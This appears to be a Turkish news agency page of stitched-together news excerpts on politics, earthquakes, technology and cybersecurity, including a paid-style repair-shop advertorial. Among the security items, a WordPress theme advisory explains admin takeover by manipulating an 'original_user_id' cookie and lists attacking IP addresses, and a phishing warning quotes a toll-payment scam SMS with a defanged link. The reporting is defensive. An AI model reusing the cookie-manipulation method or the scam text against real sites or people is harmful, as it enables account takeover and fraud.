Kaynak: CUMHA - CUMHUR HABER AJANSI

“Mescid Yok” Tepkisi Sosyal Medyada Gündem Oldu
Muharrem Kaşıtoğlu, kişisel hesabından yaptığı paylaşımda Kabataş’ta yeni yapılan tesislerde mescid bulunmamasını eleştirerek, “İBB Kabataş’ta onlarca noktaya seyahat edilebilecek iskeleler inşa etti ve hizmete soktu. Cafe var, büfe var, hediyelikçi var, kitapçı var ama mescid yok.” ifadelerini kullandı.

Kaşıtoğlu, paylaşımında ayrıca her gün binlerce kişinin transfer merkezi üzerinden seyahat ettiğini belirterek, “İnsanlara sefer saatini beklerken namazını kılabilme imkanı sağlayacak küçük de olsa bir mescidin olmaması sizin için bir eksiklik değil sanırım.” sözleriyle İstanbul Büyükşehir Belediyesi’ne çağrıda bulundu.

Yetkililere Çağrı
Paylaşımda, konunun takibi için İBB ve belediye yetkilileri etiketlenerek çözüm talep edildi. Sosyal medyada birçok kullanıcı da benzer görüşler paylaşarak, “modern bir ulaşım merkezinde ibadet alanının olmaması eksikliktir” yorumunda bulundu.

Kabataş Transfer Merkezi’nin yakın çevresinde mescid bulunup bulunmadığına ilişkin resmi bir açıklama henüz yapılmadı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dil Hareketiyle Fare Kontrolü
MouthPad^, ortodontik bir plak gibi üst damağa oturuyor ve dışarıdan fark edilmiyor. Damak yüzeyindeki kapasitif sensörler, dilin kayma yönünü X-Y koordinatına çeviriyor; dokunma ve basınç algısı ise tıklama, sürükleme veya sağ tık işlevlerini taklit ediyor. Cihaz ayrıca baş hareketlerini de algılayabiliyor. Bluetooth bağlantısıyla bilgisayarlara, tablet ve akıllı telefonlara bağlanan MouthPad^, işletim sistemleri tarafından “fare” olarak tanınıyor.

Erişilebilirlik ve Kullanıcı Profili
MIT’in yayımladığı bilgilere göre cihaz özellikle boyun altı felçliler, ALS hastaları, omurilik yaralanması yaşayanlar ve el kullanımı kısıtlı bireyler için tasarlandı. Ancak sadece engelli bireyler değil; yoğun ortamlarda ellerini kullanamayan profesyoneller de MouthPad^’i tercih edebiliyor.

Görünmez, Taşınabilir, Kişiye Özel
TechCrunch ve Forbes’un haberlerinde de vurgulandığı gibi MouthPad^’in farkı, tamamen ağzın içinde bulunması. Göz izleme sistemleri veya “sip-and-puff” cihazlarının aksine dışarıdan görünmeyen bu çözüm, mahremiyet ve taşınabilirlik avantajı sunuyor. Ağız ölçüsüne göre 3B yazıcıyla kişiye özel üretilen cihaz, 10 saate kadar konforlu kullanım imkânı sağlıyor.

Yatırım ve Gelecek Planları
Augmental, 2023’te 1 milyon dolarlık ön yatırım, 2024’te ise 4 milyon dolarlık tohum yatırımı aldı. Şirket şu anda üretim kapasitesini artırmak için ABD merkezli sınırlı gönderimlerle ilerliyor. Fiyat aralığı 1.250–2.000 dolar arasında olan MouthPad^, henüz küresel erişime açılmasa da yardımcı teknolojiler pazarında büyük ilgi görüyor.

“Teknolojiyi İnsan Vücudunun Doğal Uzantısına Dönüştürmek”
Tomás Vega, MIT haberinde motivasyonunu şu sözlerle anlatıyor: “Çocukken klavye benim için ifade özgürlüğüydü. Şimdi bu özgürlüğü ellerini kullanamayan insanlara götürmeye çalışıyorum.”

Kaynak: CUMHA - CUMHUR HABER AJANSI

Meta Artık Daha Fazla Veri Toplayacak
Yeni dönemde Meta; Facebook, Instagram, Messenger ve Threads üzerinden toplanan verileri tek bir merkezde işleyerek kullanıcı profillerini bütünsel biçimde analiz edecek. Bu sistemle kullanıcıların cihaz özelliklerinden dijital davranışlarına kadar her unsur, yapay zekâ destekli modellerle eşleştirilecek.

Toplanan Veriler Artık Daha Detaylı
Politikada belirtilen yeni veri kategorileri arasında teknik cihaz bilgileri dikkat çekiyor. Meta artık şunları kayıt altına alabilecek:

• Cihaz türü, markası ve modeli

• İşletim sistemi sürümü ve yazılım detayları

• Donanım bileşenleri, işlemci ve ekran çözünürlüğü

• Pil seviyesi ve güç durumu

• Sinyal kuvveti (Wi-Fi, mobil ağ, Bluetooth)

• Kullanılabilir depolama alanı

• Tarayıcı türü ve sürümü

• Cihazda kurulu uygulama ve dosya adları ile türleri

• Tarayıcı eklentileri ve uzantılar

Meta ayrıca kullanıcı etkinlikleri, konum geçmişi, bağlantılı hesaplar, mesajlaşma verileri, alışveriş geçmişi ve ödeme kayıtlarını da işleme dâhil ediyor.

Bu Veriler Nerelerde Kullanılacak
Şirket, toplanan bilgilerin beş ana amaçla kullanılacağını belirtti:

1. Kişiselleştirilmiş reklam gösterimleri – Kullanıcının cihaz özelliklerine ve çevrimiçi davranışına göre hedefli reklam sunmak.

2. Yapay zekâ tabanlı öneri sistemleri – İçerik akışını, video önerilerini ve arkadaş tavsiyelerini optimize etmek.

3. Güvenlik ve kötüye kullanım tespiti – Şüpheli girişleri, sahte hesapları ve dolandırıcılık faaliyetlerini belirlemek.

4. Uygulama performansını iyileştirme – Cihaz türü ve bağlantı kalitesi verilerini kullanarak uygulama hızını artırmak.

5. Yeni ürün ve hizmet geliştirme – Kullanıcı eğilimlerine göre deneysel özellikleri test etmek.

Veri Paylaşımı Sınırlı Ama Etkili
Meta, kullanıcı bilgilerinin üçüncü taraflarla yalnızca yasal zorunluluk, güvenlik kontrolü veya ticari iş birliği kapsamında paylaşılacağını bildirdi. Ancak reklam ağları, analiz hizmetleri ve bulut altyapı sağlayıcılarıyla teknik verilerin paylaşımı sürecek.

Kullanıcılar İçin Yeni Haklar
Kullanıcılar, 16 Aralık’tan itibaren “Ayarlar ve Gizlilik” sekmesinden veri tercihlerini yönetebilecek, kayıtlı bilgilerini indirip silebilecek. Şirket, değişiklik hakkında tüm hesap sahiplerine e-posta ve bildirim yoluyla bilgilendirme yapacak.

Uzmanlar Uyarıyor
Veri güvenliği uzmanları, yeni politikanın kişiselleştirilmiş deneyimi artırırken mahremiyet sınırlarını da genişletebileceğine dikkat çekiyor. Analistler, kullanıcıların cihaz izinlerini dikkatle kontrol etmeleri gerektiğini vurguluyor.

Facebook’un Yeni Gizlilik Dönemi 16 Aralık’ta Başlıyor: Meta Artık Cihaz Pilinden Tarayıcı Eklentisine Kadar Her Veriyi İzleyebilecek

Kaynak: CUMHA - CUMHUR HABER AJANSI

SMS’teki kısa bağlantıya tıklayan kullanıcı önce mobil tarayıcıda açılan sahte sayfaya yönlendiriliyor. Sayfa kullanıcıdan öncelikle cep telefonu numarasını girmesini istiyor. Telefon numarası girildikten sonra resimde görülen ödeme bölümü açılıyor; burada karttaki isim, kart numarası, son kullanma tarihi ve CVV kodu gibi bilgiler talep ediliyor. Sayfa, resmi kurum tasarımını andıran öğeler (örneğin KGM benzeri logo, “Elektronik geçiş ücretini çevrimiçi ödeyin” başlığı) kullanarak güven yaratmaya çalışıyor.

Siber güvenlik araştırmacısı ve haberci Ebubekir Bastama, yapılan incelemede sitenin yalnızca mobil cihazlarda açıldığını ve ilk aşamada telefon numarası istendiğini tespit ettiğini bildirdi. Bastama bulgularını Ulusal Siber Olaylara Müdahale Merkezi’ne (USOM) iletti.

Bu Sahte SMS Bastama tarafından eğitim verdiği bir vatandaş tarafından bildirilmesi ile tespit edilmiştir. Mesajda son ödeme tarihi 14 Ekim 2025 olarak gösteriliyor; gönderimler son günlere bırakılarak kullanıcıların acele etmesi amaçlanıyor. Benzer dolandırıcılık girişimleri yıl içinde farklı tarihlerle tekrar edilebiliyor.Site önce telefon numarası, sonra banka kartı bilgilerini talep ettiği için kullanıcı hakkında daha fazla sosyal mühendislik verisi toplanabiliyor. Kart bilgileri girildiğinde dolandırıcılar ödeme bilgilerini ele geçirip kötüye kullanabilir; ayrıca cihazlara zararlı yazılım yüklenme riski de bulunuyor.

SMS metni örneği şu şekilde bulunuyor:
"Değerli Araç Sahibi, Sistem kayıtlarına göre, HGS bakiyeniz yetersiz olduğundan aracınızın Otoyol geçiş ücreti ödenmemiştir. Cezalı duruma düşmemeniz için, lütfen 14 Ekim 2025 tarihine kadar ödemenizi tamamlayınız. Ödenmemiş Tutar: 795,00 TL Ödeme Bağlantısı: https:[//]kgminfo[.]cc/gv?qr=3urgOi"
Bağlantıya tıklayan mobil tarayıcıda ilk aşamada telefon numarası isteniyor; ardından kart bilgileri girilen sahte ödeme formu gösteriliyor. Site mobilde çalışacak şekilde tasarlandığı için masaüstünde kolayca gözden kaçabiliyor.

Resmi kurum isimleriyle gelen ancak doğrulanamayan mesajlara itibar edilmemeli. Uzmanlar şu adımları öneriyor:

• Gelen bağlantıya kesinlikle tıklanmaması ve mesajın silinmesi.

• Gönderen numaranın engellenmesi ve mobil operatöre bildirilmesi.

• Telefon numarası ve kart bilgisi girildiyse bankaya derhal başvurarak kartın bloke ettirilmesi.

Resmi kurumlar genellikle ödeme taleplerini SMS içindeki kısa bağlantılar aracılığıyla doğrudan talep etmez. Vatandaşların e-Devlet, banka mobil uygulamaları veya kurumların resmi internet siteleri üzerinden doğrulama yapması gerekiyor. Kısa URL’ler ve bilinmeyen alan adları içeren mesajlara dikkat edilmeli; SMS’teki link yerine kurumların resmi iletişim kanalları kullanılmalı. Mobil uygulama izinleri ve tarayıcı yönlendirmeleri konusunda temkinli olunmalı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İlk tespitlere göre olay, enerji depolama alanındaki lityum-iyon bataryalarda yaşanan arıza sonucu başladı. Yetkililer 384 batarya paketinin yanarak imha olduğunu, “termal kaçak” nedeniyle yangının hızla yayıldığını bildirdi.

709 kamu hizmeti etkilendi
Yangın sonrası 709 çevrimiçi kamu hizmeti geçici olarak durdu. Bunlar arasında kimlik doğrulama, dilekçe başvuruları, posta sistemleri ve idari modüller yer aldı. İlk günlerde yalnızca %10’u yeniden çalıştırılabildi. 10 Ekim 2025 itibarıyla 217 sistem (%30,6) yeniden devreye alındı.

Yedekleme eksikliği krizin boyutunu artırdı
Kayıpların büyük kısmı, G-Drive sisteminin harici yedekleme altyapısına sahip olmamasından kaynaklandı. Korea Joongang Daily’ye göre, sistem düşük öncelikli sınıflandırıldığı için harici yedekleme yatırımı yapılmamıştı. Bu nedenle verilerin kurtarılması mümkün olmadı.

Soruşturma pil kaynaklı senaryoya odaklandı
Polis ve teknik ekipler, yangının lityum-iyon bataryalardan kaynaklandığını doğrulamak için incelemelerini sürdürüyor. Batarya odalarındaki ısı sensörleri, enerji kesme sistemleri ve taşıma süreci üzerinde duruluyor.

Resmî tepkiler ve alınan önlemler
Cumhurbaşkanı Lee Jae-myung olayın ardından veri merkezini ziyaret ederek yedeklilik standartlarının güçlendirilmesi talimatını verdi. Kriz yönetim merkezi, hizmetlerin aşamalı olarak yeniden devreye alınacağını ve ikili (dual) sistem planlamasının başlatıldığını açıkladı.

Uzmanlara göre olay ders niteliğinde
Uzmanlar, “bulut sistemlerin fiziksel risklerden muaf olmadığı” vurgusunu yaptı. Çok bölgeli mimarilerin ve düzenli yedekleme testlerinin zorunlu hale getirilmesi gerektiği ifade edildi. Ayrıca, enerji depolama odalarında lityum-iyon bataryaların güvenlik protokollerinin gözden geçirilmesi istendi.

Zaman çizelgesi:

• 26 Eylül 2025: Yangın 20.15 civarında başladı, hızla yayıldı.

• 27 Eylül 2025: Yangın kontrol altına alındı.

• 1 Ekim 2025: G-Drive verilerinin kurtarılamadığı kesinleşti.

• 10 Ekim 2025: Kurtarma oranı %30,6’ya ulaştı.

Güney Kore Devlet Veri Merkezi Yangını: 858 TB kalıcı veri kaybı, 709 kamu sistemi etkilendi

Kaynak: CUMHA - CUMHUR HABER AJANSI

 Günümüzde bilgisayarlar hem iş hem de sosyal hayatın vazgeçilmez bir parçası haline gelmiştir. Öğrencilerden profesyonel çalışanlara, işletmelerden ev kullanıcılarına kadar herkes bilgisayarına kesintisiz ihtiyaç duyar. Ancak her elektronik cihazda olduğu gibi bilgisayarlarda da zamanla donanımsal veya yazılımsal arızalar meydana gelebilir. İşte bu noktada bilgisayar tamiri Ankara hizmetleri büyük önem kazanır.

Ankara gibi yoğun iş temposuna sahip büyük bir şehirde, bilgisayarın aniden arızalanması ciddi zaman ve iş kaybına yol açabilir. Bu nedenle, güvenilir ve uzman bir Ankara bilgisayar tamircisi ile çalışmak, cihazın ömrünü uzatmak ve sorunsuz bir şekilde kullanmaya devam etmek için en doğru seçimdir.

Profesyonel Teknik Servisin Önemi

Her ne kadar küçük arızalar evde çözülmeye çalışılsa da bilgisayar gibi karmaşık cihazların profesyonel ellerde onarılması gerekir. Yanlış yapılan bir müdahale, küçük bir sorunu daha büyük bir arızaya dönüştürebilir. Ayrıca, cihazların içinde yer alan hassas parçaların korunması ve orijinal yedek parçaların kullanılması ancak profesyonel servisler sayesinde mümkün olur.

Bu noktada öne çıkan isimlerden biri Revoser Teknik Servis’tir. Ankara’nın merkezinde hizmet veren Revoser, deneyimli teknisyen kadrosu ve modern ekipmanlarıyla bilgisayar tamirinde güvenilir bir adrestir.

Revoser’in Uzmanlık Alanları

Revoser, Ankara’da uzun yıllardır bilgisayar ve laptop tamiri konusunda hizmet vermektedir. Firma, sadece arıza çözümünde değil, aynı zamanda bakım ve performans artırıcı işlemlerde de kullanıcıların yanında yer alır.

Başlıca sunduğu hizmetler şunlardır:

• Laptop ekran değişimi

• Klavye ve menteşe tamiri

• Batarya ve adaptör sorunlarının çözümü

• Anakart ve chipset tamiri

• Veri kurtarma işlemleri

• Fan temizliği ve ısınma problemleri çözümü

• Format ve yazılım yükleme

Bu hizmetler sayesinde kullanıcılar, cihazlarını ilk günkü performansına kavuşturabilmektedir.

Laptop ve Masaüstü Bilgisayarlarda Sık Karşılaşılan Arızalar

Bilgisayar kullanıcılarının en çok şikayet ettiği sorunlar arasında cihazın açılmaması, ekranın görüntü vermemesi, aşırı ısınma, donma veya mavi ekran hataları yer alır. Ayrıca, laptoplarda klavye tuşlarının çalışmaması, menteşe kırılması ve şarj olmama problemleri de oldukça yaygındır.

Revoser Teknik Servis, bu tür arızalarda hızlı teşhis ve doğru onarım yöntemleriyle müşterilerine zaman kazandırır. Özellikle iş dünyasında yoğun kullanılan cihazlarda, onarım süresinin kısa olması büyük avantaj sağlar.

Revoser’in Sunduğu Avantajlar

Revoser’i Ankara’daki diğer bilgisayar tamircilerinden ayıran en önemli özelliklerden biri müşteri memnuniyetine verdiği önemdir. Firma, yaptığı her onarım işleminde garanti sunar ve orijinal yedek parça kullanır.

Avantajları şu şekilde sıralanabilir:

• Deneyimli teknisyen ekibi

• Hızlı arıza tespit ve çözüm süreci

• Orijinal yedek parça garantisi

• Uygun fiyatlı onarım çözümleri

• Ankara merkezde kolay ulaşım imkânı

• Tüm marka ve modellere destek

Bu sayede, Ankara bilgisayar tamircisi arayışında olan kullanıcılar gönül rahatlığıyla Revoser’i tercih edebilir.

Güvenilir Çözüm Adresi Revoser

Bilgisayar arızaları, günlük yaşamı sekteye uğratabilecek en can sıkıcı durumlardan biridir. Ancak doğru servis seçimi sayesinde bu sorunları kısa sürede aşmak mümkündür.

Ankara’da güvenilir bir bilgisayar tamiri Ankara hizmeti arıyorsanız, Revoser Teknik Servis sizin için en doğru adres olacaktır. Uzman kadrosu, müşteri odaklı yaklaşımı ve garantili hizmet anlayışıyla Revoser, hem laptop hem de masaüstü bilgisayarlarınızda karşılaştığınız her türlü sorunu profesyonel şekilde çözer.

Cihazlarınızın ömrünü uzatmak, verimli çalışmasını sağlamak ve gönül rahatlığıyla kullanmak için siz de Ankara bilgisayar tamircisi denildiğinde akla ilk gelen isimlerden biri olan Revoser’i tercih edebilirsiniz.

Adres: Eti Mahallesi Toros Sokak No: 41/A Sıhhiye, 06570 Çankaya/Ankara
Telefon: 0(312) 229 79 70

Kaynak: CUMHA - CUMHUR HABER AJANSI

Uzmanlara göre, zafiyet “service_finder_switch_back()” adlı fonksiyonun hatalı çalışmasından kaynaklanıyor. Bu fonksiyon, kullanıcı geçişlerinde “original_user_id” adlı çerezi kullanıyor ancak bu çerezde kimlik doğrulama kontrolü bulunmuyor. Saldırganlar bu çerezi manipüle ederek yönetici yetkilerine sahip hesaplara erişim sağlayabiliyor.

Siber güvenlik araştırmacıları, söz konusu açığın kötü niyetli kişilere içerik değiştirme, şifre güncelleme, zararlı kod ekleme veya siteyi oltalama ve kötü amaçlı yazılım kampanyalarında kullanma imkânı tanıdığını belirtiyor.

Etki Alanı ve Riskler
Açık, “Service Finder” temasının 6.0 sürümüne kadar olan tüm versiyonlarını etkiliyor. Tema güncel değilse, sistem üzerinde hiçbir eklenti olmasa bile site savunmasız durumda olabiliyor. Etkilenen sistemlerde izinsiz girişler, yeni kullanıcı hesaplarının oluşturulması ve yönetici panosunda olağandışı aktiviteler gözlemlenebiliyor.

Güvenlik raporlarına göre, saldırı girişimlerinde 5.189.221.98, 185.109.21.157, 192.121.16.196, 194.68.32.71 ve 178.125.204.198 IP adreslerinden gelen istekler tespit edildi. Ancak bu adreslerin kayıtlarında bulunmaması sistemin güvenli olduğu anlamına gelmiyor.

Alınması Gereken Önlemler
Uzmanlar, temanın 6.0 sonrası sürümüne geçilmesini, tüm kullanıcı hesaplarının ve yetkilerinin gözden geçirilmesini, güvenlik duvarı (WAF) veya Wordfence gibi eklentilerin aktif hale getirilmesini öneriyor. Ayrıca site trafiği ve çerez davranışlarının özellikle yönetici oturumlarında izlenmesi gerektiği vurgulanıyor.

Sistemin yedekten geri yüklenmesi planlanıyorsa, kullanılan yedeklerin temiz ve güvenilir bir kaynaktan alındığından emin olunması gerekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tehdit Kapasitesi
Yetkililer, ele geçirilen sistemin dakikada 30 milyon SMS gönderebilecek büyüklükte olduğunu açıkladı. Ağın baz istasyonlarını devre dışı bırakma, 911 acil yardım hattına DDoS saldırısı düzenleme ve şifreli iletişim sağlama gibi işlevlere sahip olduğu belirtildi. Bu kapasitenin kamu güvenliğini ve diplomatik faaliyetleri doğrudan tehlikeye atabileceği vurgulandı.

BM Genel Kurulu Çevresinde Yoğunlaşma
Operasyonda tespit edilen cihazların büyük kısmı BM Genel Kurulu’nun yapıldığı bölge çevresinde bulundu. Bu durum, ağın uluslararası diplomatik etkinliği hedef aldığı ihtimalini güçlendirdi.

Ulus-Devlet ve Suç Örgütleri Bağlantısı
ABD’li yetkililer, adli incelemenin sürdüğünü ve ilk bulguların ulus-devlet destekli tehdit aktörleri ile organize suç grupları arasında bağlantıya işaret ettiğini duyurdu. Uzmanlara göre bu tür bir ağ casusluk, kritik altyapılara saldırı planlama ve gizli iletişim için kullanılabiliyor.

Fail Belirsizliğini Koruyor
Operasyon sonrası bazı çevrelerde Rusya, Çin ve İsrail’in adı geçse de, ABD yetkilileri herhangi bir ülkeyi resmi olarak işaret etmedi. Gizli Servis sözcüsü, “Henüz belirli bir devlet ya da örgütü suçlayacak delil yok” ifadesini kullandı.

ABD’nin Çok Katmanlı Önlemleri
Operasyona Gizli Servis’in yanı sıra FBI, İç Güvenlik Bakanlığı (DHS) ve New York polisinin de katıldığı bildirildi. BM Genel Kurulu boyunca şehirde üst düzey güvenlik protokolleri uygulandı.

Adli İnceleme Devam Ediyor
Ele geçirilen cihazlar üzerinde yapılan incelemeler, sistemin hangi ülke ya da örgütlerle bağlantılı olduğunu ve planlanan olası saldırıların boyutunu ortaya koyacak. Yetkililer, “Tehdit tam olarak ortadan kalkmış değil, soruşturma sürüyor” uyarısında bulundu.

ABD Gizli Servisi BM Genel Kurulu çevresinde 100 bin SIM kartlık gizli iletişim ağını çökertti

Kaynak: CUMHA - CUMHUR HABER AJANSI

Depremin ardından aynı bölgede kısa aralıklarla çok sayıda artçı sarsıntı yaşandı. Sındırgı çevresinde 1.1 ile 2.8 büyüklükleri arasında çok sayıda deprem kaydedildi.

Çevre illerde de sarsıntılar hissedildi
Balıkesir merkezli depremin ardından Kütahya’nın Simav ilçesinde 1.7 ve 2.6 büyüklüğünde sarsıntılar rapor edildi. Ayrıca Malatya’nın Yeşilyurt ve Pütürge ilçeleri ile Elazığ’ın Sivrice ve Arıcak ilçelerinde 1.0 ile 2.5 büyüklükleri arasında depremler kaydedildi.

Marmara Denizi açıklarında da 1.7 büyüklüğünde hafif bir deprem meydana geldi.

Artçı sarsıntılar takip ediliyor
Uzmanlar, bölgede meydana gelen 4.9 büyüklüğündeki depremin ardından artçı sarsıntıların devam etmesinin normal olduğunu belirtiyor. Depremler nedeniyle şu ana kadar can kaybı veya hasara dair resmi bir açıklama yapılmadı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Duran, mesajında BM’nin 1945’te kuruluşundan bu yana küresel barış, güvenlik ve uluslararası iş birliği alanlarında önemli katkılar sunduğunu, ancak mevcut yapısının günümüzün dinamik ve karmaşık sorunlarını temsil etmekten uzak kaldığını söyledi.

BM reform ihtiyacı
Duran, son yıllarda yaşanan krizlerin BM’nin yetersizliğini ortaya koyduğunu belirterek, “İsrail’in Gazze’de yol açtığı yıkım, mevcut yapının adaletsiz ve işlevsiz işleyişinin en çarpıcı örneklerinden biridir” dedi. BM Güvenlik Konseyi’ndeki veto mekanizmasının karar almayı engellediğini ifade eden Duran, yapının acilen reforma ihtiyaç duyduğunu vurguladı.

Adalet merkezli küresel düzen çağrısı
Konuşmasında adaletin temel bir kavram olarak öne çıkması gerektiğini belirten Duran, “Cumhurbaşkanımız Recep Tayyip Erdoğan’ın ‘daha adil bir dünya mümkün’ anlayışı doğrultusunda, Türkiye olarak her platformda adalet, eşitlik ve istikrar için gayret gösteriyoruz” dedi.

Türkiye’nin reform çağrılarının mazlum halkların ve küresel vicdanın sesi olduğunu kaydeden Duran, güçlülerin değil haklının kazandığı bir düzenin kurulması gerektiğini söyledi. “Adalet olmadan barış, barış olmadan da sürdürülebilir bir gelecek mümkün değildir” diyen Duran, Türkiye’nin bu vizyonla küresel düzene katkı sunduğunu belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Erdoğan, BM Genel Kurulu’nun bu yıl "Birlikte daha iyi barış, kalkınma ve insan hakları için 80 yıl ve daha fazlası" temasıyla gerçekleştirileceğini belirtti. 140’tan fazla ülkenin devlet ve hükümet başkanı düzeyinde katılımının beklendiğini açıkladı.

"Dünya 5’ten büyüktür" vurgusu
Cumhurbaşkanı Erdoğan, BM’nin mevcut yapısının yetersizliğine değinerek, “Özellikle insani krizlerin çözümünün Güvenlik Konseyi’nin veto yetkisini haiz ülkelerin insafına bırakılmasının hiçbir izahı yoktur. Bu acı gerçeği 12 yıl önce BM kürsüsünden ‘Dünya 5’ten büyüktür’ diyerek ilan etmiştik” ifadelerini kullandı.

Gazze ve KKTC gündemde olacak
Erdoğan, 23 Eylül Salı günü BM Genel Kurulu’na hitap edeceğini belirterek, konuşmasında Gazze’deki insani krizi öne çıkaracağını söyledi. Ayrıca Türkiye’nin bölgesel barış çabalarına, uluslararası katkılarına ve Kuzey Kıbrıs Türk Cumhuriyeti’nin haklarına değineceğini aktardı.

Suriye’nin yeni yönetimi ve Filistin meselesi
Erdoğan, birçok ülkenin Filistin’i devlet olarak tanıyacağını ve bunun iki devletli çözüme ivme kazandırmasını temenni ettiklerini belirtti. Ayrıca Suriye’nin yeni yönetiminin genel kurulda yer almasını “sevindirici bir gelişme” olarak nitelendirdi.

Basın mensuplarının sorularını yanıtlayan Erdoğan, Filistin’in tanınmasıyla ilgili olarak, “Şu an itibarıyla BM’de 140 ülke Filistin’i tanıyor. Bu sayı arttıkça Filistin’in tanınmışlığı daha da gelişecektir” dedi.

ABD Başkanı Trump ile görüşme
Erdoğan, 25 Eylül Perşembe günü Washington’da ABD Başkanı Donald Trump ile bir araya geleceğini belirtti. Görüşmede ticaret, yatırım ve savunma sanayisi gibi başlıkların yanı sıra bölgesel meselelerin ele alınacağını ifade etti.

Özgür Özel’in iddialarına yanıt
CHP Genel Başkanı Özgür Özel’in “Trump’ın oğluyla Gazze pazarlığı yapıldığı” iddiasına ilişkin soruya Erdoğan, “Bizler, uçak alımlarını filan Özgür Özel’e sorarak bugüne kadar yapmadık ve yapmayız. Zaten bu işlerden de anlamaz. Eğer bir görüşme olacaksa Trump’ın bizzat kendisiyle yaparız” yanıtını verdi.

Cumhurbaşkanı Erdoğan, New York ziyaretinde BM Genel Sekreteri Antonio Guterres ile görüşmelerin yanı sıra Türk-Amerikan toplumu, iş dünyası ve liderlerle temaslarda bulunacağını da açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Brüksel’den açıklama
Brüksel Havalimanı, 19 Eylül Cuma gecesi, kullandıkları check-in ve biniş sistemlerine hizmet veren firmaya siber saldırı düzenlendiğini açıkladı. Açıklamada, sistemin devre dışı kalması nedeniyle işlemlerin yalnızca manuel yapılabildiği ve bu durumun uçuşlarda ciddi gecikmelere yol açtığı belirtildi.

Şirketten yanıt
ABD merkezli Collins Aerospace, Avrupa’daki birçok havalimanına check-in ve biniş sistemleri sağladıklarını, saldırı nedeniyle hizmetlerde kesinti yaşandığını duyurdu. Şirket, sorunu gidermek ve sistemleri en kısa sürede yeniden devreye almak için çalışmaların sürdüğünü açıkladı.

Londra ve Berlin de etkilendi
Londra Heathrow Havalimanı, sistem sağlayıcı Collins Aerospace’in yaşadığı sorun nedeniyle giden yolcularda uzun bekleme sürelerinin oluştuğunu bildirdi. Berlin Havalimanı ise Avrupa genelindeki teknik arızadan dolayı yolcuların check-in işlemlerinde gecikmeler yaşanabileceğini ifade etti.

Yolculara uyarı
Brüksel Havalimanı, uçuşu bulunan yolculara havayolu şirketleriyle iletişime geçerek uçuş durumlarını kontrol etmeleri ve onaylı uçuşu olanların havalimanına en az 3 saat önce gelmeleri yönünde çağrı yaptı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Trump, istihbarat raporlarının teknenin yasa dışı uyuşturucu taşıdığını doğruladığını, rotasının ise Amerikalılar üzerinde etkili olan uyuşturucu trafiğinde kullanılan güzergah olduğunu belirtti.

Uluslararası sularda gerçekleştirilen operasyonda teknede bulunan 3 kişi öldü. Trump, saldırıda herhangi bir ABD askerinin zarar görmediğini vurguladı.

Trump açıklamasında, “Amerika’da fentanil, uyuşturucu ve yasa dışı ilaç satışını ve Amerikalılara yönelik şiddet ile terör eylemlerini durdurun.” ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Panelde Gazze’de yaşanan insani kriz, uluslararası toplumun tutumu ve çözüm önerileri tartışılacak. Katılımcıların gündemdeki gelişmeleri farklı bakış açılarıyla değerlendirmesi hedefleniyor.

Etkinliğe katılmak isteyenler çevrim içi kayıt sistemi üzerinden başvuru yapabilecek.

Kayıt Linki

Kaynak: CUMHA - CUMHUR HABER AJANSI

İddialara göre, bazı kişilerin İnönü Üniversitesi üzerinden sahte diploma temin ettiği ve bu isimler arasında Osmanoğlu’nun da bulunduğu öne sürülmüştü. Konuyla ilgili Ankara Cumhuriyet Başsavcılığı tarafından soruşturma başlatıldığı öğrenildi.

İfade verdiğini duyurdu
Abdülhamid Kayıhan Osmanoğlu, soruşturmadan haberdar olur olmaz ifade verdiğini açıkladı. Osmanoğlu, “Tarafımca İnönü Üniversitesi’nden sahte diploma alınması amacıyla ne üniversite nezdinde ne de bu işle ilgili aracı kişilerden herhangi bir talepte bulunulmamıştır.” dedi.

"Diplomanın varlığından haberim yok"
Kendisinin adına hazırlandığı iddia edilen diplomanın hiçbir kurum ya da kuruluşta kullanılmadığını vurgulayan Osmanoğlu, lise mezunu olduğunu ve tüm resmi başvurularda öğrenim durumunu bu şekilde beyan ettiğini belirtti.

Suç duyurusunda bulundu
İsminin bilgisi dışında bu sürece dâhil edildiğini söyleyen Osmanoğlu, kişilik haklarının zarar gördüğünü ifade etti. Açıklamasında, “İsmimi kullanarak adıma diploma düzenleyen tüm kişi ve yetkililerden şikâyetçiyim.” ifadesine yer verdi.

Soruşturma kapsamında Osmanoğlu’nun imza örneklerinin üniversite kayıtlarıyla karşılaştırmalı olarak incelenmesini talep ettiği de belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

4.9’luk depremin ardından saat 12.38’de 3.4, saat 12.41’de ise 4.1 büyüklüğünde iki ayrı sarsıntı daha kaydedildi. Bölgede aynı gün içinde 1.0 ile 1.9 arasında değişen çok sayıda küçük artçı deprem de yaşandı.

Depremler Balıkesir merkezinde ve çevre ilçelerde hissedildi. İlk belirlemelere göre herhangi bir can kaybı veya ciddi hasar bilgisi paylaşılmadı. Yetkililer, bölgede artçıların sürebileceğini belirterek vatandaşlara dikkatli olmaları yönünde uyarılarda bulundu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Beykoz Belediyesi tarafından organize edilen etkinlik, 6 Eylül Cumartesi günü saat 11.30’da başlayacak. Vatandaşlar, sahil alanında bir araya gelerek milli takıma destek verecek.

Milli heyecan sahilde buluşacak
Cumhuriyetin 100. yılında uluslararası arenada büyük başarılar elde eden A Milli Kadın Voleybol Takımı’nın yarı final maçı, Beykoz’da coşkulu bir atmosferde izlenecek. Sabah saatlerinden itibaren sahile gelen sporseverler, kırmızı-beyaz bayraklarla milli takıma destek olacak.

Etkinlik detayları
Beykoz Sahili Etkinlik Alanı’nda vatandaşların karşılaşmayı rahatça takip edebilmesi için dev ekran kurulacak. Aileler, gençler ve çocukların katılım göstereceği organizasyonda çeşitli ikramlar ve sürpriz etkinlikler de yer alacak.

Başkan vekilinden çağrı
Beykoz Belediye Başkan Vekili Özlem Vural Gürzel, milli maç heyecanına tüm ilçe sakinlerini davet ederek, “Milli takımımızın yarı final mücadelesini Beykoz sahilinde dev ekranda hep birlikte izleyeceğiz. Bu gurur ve heyecan dolu anlarda tüm hemşehrilerimizi ay-yıldızlı bayraklarıyla sahile davet ediyorum” dedi.

Tek yürek destek
